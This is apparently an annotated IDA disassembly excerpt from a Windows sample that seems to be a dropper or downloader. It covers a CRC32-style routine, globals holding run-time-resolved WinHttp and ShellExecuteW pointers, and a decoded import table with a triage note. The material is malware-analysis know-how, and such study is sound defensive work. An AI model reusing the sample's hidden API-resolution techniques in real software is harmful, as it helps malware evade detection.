.text:00401EAB 66 35 20 83 xor ax, 8320h ; low half of the polynomial
.text:00401EAF 66 81 F3 B8 ED xor bx, 0EDB8h ; high half of the polynomial
.text:00401EB4
.text:00401EB4 loc_401EB4: ; CODE XREF: sub_401E80+29j
.text:00401EB4 FE CE dec dh
.text:00401EB6 75 EB jnz short loc_401EA3 ; 8 bits per byte
.text:00401EB8 33 C8 xor ecx, eax ; fold the result into the low state half
.text:00401EBA 33 D3 xor edx, ebx ; fold the result into the high state half
.text:00401EBC 4F dec edi
.text:00401EBD 75 D5 jnz short loc_401E94
.text:00401EBF F7 D2 not edx ; final complement
.text:00401EC1 F7 D1 not ecx
.text:00401EC3 8B C2 mov eax, edx
.text:00401EC5 C1 C0 10 rol eax, 10h ; dx moves to the upper 16 bits
.text:00401EC8 66 8B C1 mov ax, cx ; eax = (dx << 16) | cx
.text:00401ECB 89 45 FC mov [ebp+var_4], eax
.text:00401ECE 61 popa
.text:00401ECF 8B 45 FC mov eax, [ebp+var_4] ; reload the result after popa restored eax
.text:00401ED2 5F pop edi
.text:00401ED3 5E pop esi
.text:00401ED4 5B pop ebx
.text:00401ED5 C9 leave
.text:00401ED6 C3 retn
.text:00401ED6 sub_401E80 endp
.text:00401ED6
.text:00401ED6 ; ---------------------------------------------------------------------------
.text:00401ED7 CC align 4
.text:00401ED8 ; LPWSTR lpBuffer
.text:00401ED8 00 00 00 00 lpBuffer dd 0 ; DATA XREF: start+8Aw
.text:00401ED8 ; start+124r ... | string pointer set in start; used as the leading %s in sub_401AFC and sub_401DB3. These writable globals sit in the .text section.
.text:00401EDC 00 00 00 00 dword_401EDC dd 0 ; DATA XREF: start+22Dr
.text:00401EDC ; sub_4019C4+ADw ... | ShellExecuteW pointer (stored by sub_4019C4)
.text:00401EE0 00 00 00 00 dword_401EE0 dd 0 ; DATA XREF: sub_4019C4+125w
.text:00401EE0 ; sub_401C0D+7Dr | WinHttpOpen pointer (stored by sub_4019C4)
.text:00401EE4 00 00 00 00 dword_401EE4 dd 0 ; DATA XREF: sub_4019C4+F1w
.text:00401EE4 ; sub_401C0D+10Dr | WinHttpSendRequest pointer (stored by sub_4019C4)
.text:00401EE8 00 00 00 00 dword_401EE8 dd 0 ; DATA XREF: sub_40197F+1Dr
.text:00401EE8 ; sub_4019C4+83w | wnsprintfA pointer (stored by sub_4019C4)
.text:00401EEC 00 00 00 00 dword_401EEC dd 0 ; DATA XREF: start+98w
.text:00401EEC ; start+225r ... | buffer pointer set in start; destination of the path built in sub_401AFC
.text:00401EF0 00 00 00 00 dword_401EF0 dd 0 ; DATA XREF: start+20Dr
.text:00401EF0 ; sub_4019C4+A0w | SetupIterateCabinetW pointer (stored by sub_4019C4)
.text:00401EF4 00 00 00 00 dword_401EF4 dd 0 ; DATA XREF: sub_4019C4+BDw
.text:00401EF4 ; sub_401C0D+14r | StrStrIW pointer (stored by sub_4019C4)
.text:00401EF8 00 00 00 00 dword_401EF8 dd 0 ; DATA XREF: start+7Dw
.text:00401EF8 ; sub_401AFC+76r ... | buffer pointer set in start; sub_401BB7 writes the file-name stem through it
.text:00401EFC 00 00 00 00 dword_401EFC dd 0 ; DATA XREF: start+162r
.text:00401EFC ; sub_4017BB+1Er ... | wnsprintfW pointer (stored by sub_4019C4)
.text:00401F00 00 00 00 00 dword_401F00 dd 0 ; DATA XREF: sub_4019C4+10Bw
.text:00401F00 ; sub_401C0D+BCr | WinHttpOpenRequest pointer (stored by sub_4019C4)
.text:00401F04 00 00 00 00 dword_401F04 dd 0 ; DATA XREF: sub_4018A1+Dr
.text:00401F04 ; sub_4019C4+CAw | SystemFunction036 pointer (stored by sub_4019C4)
.text:00401F08 00 00 00 00 dword_401F08 dd 0 ; DATA XREF: sub_4019C4+E4w
.text:00401F08 ; sub_401C0D+11Dr | WinHttpReceiveResponse pointer (stored by sub_4019C4)
.text:00401F0C 00 00 00 00 dword_401F0C dd 0 ; DATA XREF: sub_4019C4+118w
.text:00401F0C ; sub_401C0D+99r | WinHttpConnect pointer (stored by sub_4019C4)
.text:00401F10 00 00 00 00 dword_401F10 dd 0 ; DATA XREF: sub_4019C4+12Fw
.text:00401F10 ; sub_401C0D+16Br | WinHttpReadData pointer (stored by sub_4019C4)
.text:00401F14 00 00 00 00 dword_401F14 dd 0 ; DATA XREF: sub_4019C4+D7w
.text:00401F14 ; sub_401C0D+149r | WinHttpQueryDataAvailable pointer (stored by sub_4019C4)
.text:00401F18 00 00 00 00 dword_401F18 dd 0 ; DATA XREF: sub_4019C4+FEw
.text:00401F18 ; sub_401C0D+D2r ... | WinHttpSetOption pointer (stored by sub_4019C4)
; PE import directory, left undecoded by IDA and stored in the same section as the code.
; Each import descriptor is five dwords: OriginalFirstThunk, TimeDateStamp,
; ForwarderChain, Name, FirstThunk. All five are RVAs or zero; add imagebase 400000h.
; The descriptors are followed by the per-DLL import lookup tables, whose entries
; are RVAs of hint/name records; the names given here are decoded from those records.
.text:00401F1C 58 1F 00 00 00 00+ dd 1F58h, 2 dup(0) ; descriptor 0: OriginalFirstThunk=1F58h, TimeDateStamp=0, ForwarderChain=0
.text:00401F28 E8 20 00 00 00 10+ dd 20E8h, 1000h, 1FACh, 2 dup(0) ; descriptor 0: Name=20E8h "KERNEL32.dll", FirstThunk=1000h (IAT at 0x401000); descriptor 1: OriginalFirstThunk=1FACh, two zero fields
.text:00401F3C 04 21 00 00 54 10+ dd 2104h, 1054h, 5 dup(0) ; descriptor 1: Name=2104h "USER32.dll", FirstThunk=1054h; the all-zero descriptor ends the table
.text:00401F58 B4 1F 00 00 C2 1F+ dd 1FB4h, 1FC2h, 1FD2h, 1FE2h, 1FF0h, 1FFCh, 2004h, 2016h ; KERNEL32 lookup table: ExitProcess, FindResourceA, LoadResource, VirtualFree, WriteFile, Sleep, SizeofResource, GetModuleFileNameW
.text:00401F58 00 00 D2 1F 00 00+ dd 202Ch, 203Ah, 2046h, 2056h, 2066h, 2078h, 2088h, 2098h ; CreateFileW, lstrlenW, GetTempPathW, GetLastError, GetProcAddress, VirtualAlloc, LoadLibraryA, LockResource
.text:00401F58 E2 1F 00 00 F0 1F+ dd 20A8h, 20BCh, 20CCh, 20DAh, 0 ; GetModuleHandleA, CreateMutexA, CloseHandle, DeleteFileW, zero terminator (20 imports)
.text:00401FAC F6 20 00 00 00 00+ dd 20F6h, 0 ; USER32 lookup table: MessageBoxA, zero terminator
; Import hint/name table: each record is a 16-bit hint followed by a NUL-terminated
; ASCII name, padded to an even address. IDA rendered most of it as dwords, so the
; text is packed little-endian; the trailing comments give the decoded bytes in order.
; The two DLL name strings referenced by the import descriptors are stored here too.
; Triage note: the static imports cover resource access, temp-path file creation and
; writing, VirtualAlloc, a mutex, and LoadLibraryA/GetProcAddress. No networking API
; is imported by name, so any such calls are presumably resolved at run time --
; confirm in the code; the import list alone understates the sample's capabilities.
.text:00401FB4 04 01 45 78 69 74+ dd 78450104h, 72507469h, 7365636Fh, 1360073h, 646E6946h ; hint 0104h "ExitProcess", hint 0136h "Find..."
.text:00401FB4 50 72 6F 63 65 73+ dd 6F736552h, 65637275h, 2F60041h, 64616F4Ch, 6F736552h ; "...ResourceA", hint 02F6h "LoadReso..."
.text:00401FB4 73 00 36 01 46 69+ dd 65637275h, 4570000h, 74726956h, 466C6175h, 656572h ; "...urce", hint 0457h "VirtualFree"
.text:00401FB4 6E 64 52 65 73 6F+ dd 7257048Dh, 46657469h, 656C69h, 6C530421h, 706565h, 69530420h ; hint 048Dh "WriteFile", hint 0421h "Sleep", hint 0420h "Si..."
.text:00401FB4 75 72 63 65 41 00+ dd 666F657Ah, 6F736552h, 65637275h, 1F50000h ; "...zeofResource", then hint 01F5h for the name on the next line
.text:00402018 47 65 74 4D 6F 64+aGetmodulefilen db 'GetModuleFileNameW',0 ; name part of the hint/name record at RVA 2016h
.text:0040202B 00 align 4 ; one zero pad byte before the next record
.text:0040202C 7F 00 43 72 65 61+ dd 7243007Fh, 65746165h, 656C6946h, 4B60057h, 7274736Ch ; hint 007Fh "CreateFileW", hint 04B6h "lstr..."
.text:0040202C 74 65 46 69 6C 65+ dd 576E656Ch, 25B0000h, 54746547h, 50706D65h, 57687461h ; "...lenW", hint 025Bh "GetTempPathW"
.text:0040202C 57 00 B6 04 6C 73+ dd 1E60000h, 4C746547h, 45747361h, 726F7272h, 2200000h ; hint 01E6h "GetLastError", then hint 0220h
.text:0040202C 74 72 6C 65 6E 57+ dd 50746547h, 41636F72h, 65726464h, 7373h, 69560454h, 61757472h ; "GetProcAddress", hint 0454h "Virtua..."
.text:0040202C 00 00 5B 02 47 65+ dd 6C6C416Ch, 636Fh, 6F4C02F1h, 694C6461h, 72617262h, 4179h ; "...lAlloc", hint 02F1h "LoadLibraryA"
.text:0040202C 74 54 65 6D 70 50+ dd 6F4C0307h, 65526B63h, 72756F73h, 6563h, 654701F6h, 646F4D74h ; hint 0307h "LockResource", hint 01F6h "GetMod..."
.text:0040202C 61 74 68 57 00 00+ dd 48656C75h, 6C646E61h, 4165h, 7243008Bh, 65746165h, 6574754Dh ; "...uleHandleA", hint 008Bh "CreateMute..."
.text:0040202C E6 01 47 65 74 4C+ dd 4178h, 6C430043h, 4865736Fh, 6C646E61h, 0C30065h, 656C6544h ; "...xA", hint 0043h "CloseHandle", hint 00C3h "Dele..."
.text:0040202C 61 73 74 45 72 72+ dd 69466574h, 57656Ch, 4E52454Bh, 32334C45h, 6C6C642Eh ; "...teFileW", then DLL name "KERNEL32.dll" at RVA 20E8h
.text:0040202C 6F 72 00 00 20 02+ dd 1F80000h, 7373654Dh, 42656761h, 41786Fh, 52455355h ; hint 01F8h "MessageBoxA", then DLL name "USER..." at RVA 2104h
.text:0040202C 47 65 74 50 72 6F+ dd 642E3233h, 6C6Ch, 3Ch dup(0) ; "...32.dll", then 3Ch zero dwords filling the section out to its 1200h raw size
.text:0040202C 63 41 64 64 72 65+_text ends
.text:0040202C 73 73 00 00 54 04+
.text:0040202C 56 69 72 74 75 61+
.text:0040202C 6C 41 6C 6C 6F 63+ end start